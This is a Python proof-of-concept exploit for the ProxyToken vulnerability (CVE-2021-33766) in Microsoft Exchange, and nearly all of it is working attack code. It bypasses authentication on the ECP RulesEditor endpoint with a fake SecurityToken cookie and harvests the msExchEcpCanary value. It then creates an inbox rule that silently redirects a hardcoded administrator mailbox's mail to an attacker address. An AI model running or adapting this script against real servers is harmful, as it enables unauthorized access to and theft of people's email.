CVE-2021-33766.py

import requests
import json
import argparse

parser = argparse.ArgumentParser(description='A PoC for ProxyToken CVE-2021-33766')
parser.add_argument('--target', dest='target',required=True,  help='Target Exchange Server to exploit')
args = parser.parse_args()
target = args.target

victim_email = "administrator@exchange20.local"
user_agent = "Mozilla/5.0"
exploit_content = {"properties":
                       {"RedirectTo":
                            [{"RawIdentity": "attacker@contoso.local",
                              "DisplayName": "PWNED",
                              "Address": "attacker@contoso.local",
                              "AddressOrigin": 3,
                              "RecipientFlag": 0,
                              "RoutingType": "SMTP",
                              "SMTPAddress": "attacker@contoso.local"}],
                        "Name": "SheloNeda555",
                        "StopProcessingRules": True}}

exploit_page = "RulesEditor/InboxRules.svc/NewObject"
test_body = {"test": "value"}


# Initial request to obtains the msExchEcpCanary for the response // Status code will be 500
stage1 = requests.post("https://%s/ecp/%s/%s" % (target,victim_email, exploit_page),
                       headers={
                           "Accept-Encoding": "gzip, deflate",
                           "Accept": "*/*",
                           "Connection": "close",
                           "Cookie": "SecurityToken=x",
                           "Content-Type": "application/json; charset=utf-8",
                           "User-Agent": user_agent},
                       data=test_body,
                       verify=False
                       )

if stage1.status_code == 500:
    try:
        canary = stage1.cookies['msExchEcpCanary']
        canary_param = "?msExchEcpCanary=%s" % canary
        exploit_serialized = json.dumps(exploit_content)
        # After getting the msExchange Canary, craft new POST and Exploit the system
        stage2 = requests.post("https://%s/ecp/%s/%s%s" % (target, victim_email, exploit_page, canary_param),
                               headers={
                                   "Accept-Encoding"
                                   "": "gzip, deflate",
                                   "Accept": "*/*",
                                   "Connection": "close",
                                   "Cookie": "SecurityToken=x",
                                   "Content-Type": "application/json; charset=utf-8",
                                   "User-Agent": user_agent},
                               data=exploit_serialized,
                               verify=False
                               )
        print(stage2)

    except Exception as e:
        print("Got Exception: ", e)


else:
    print("It tooo late to apologizee")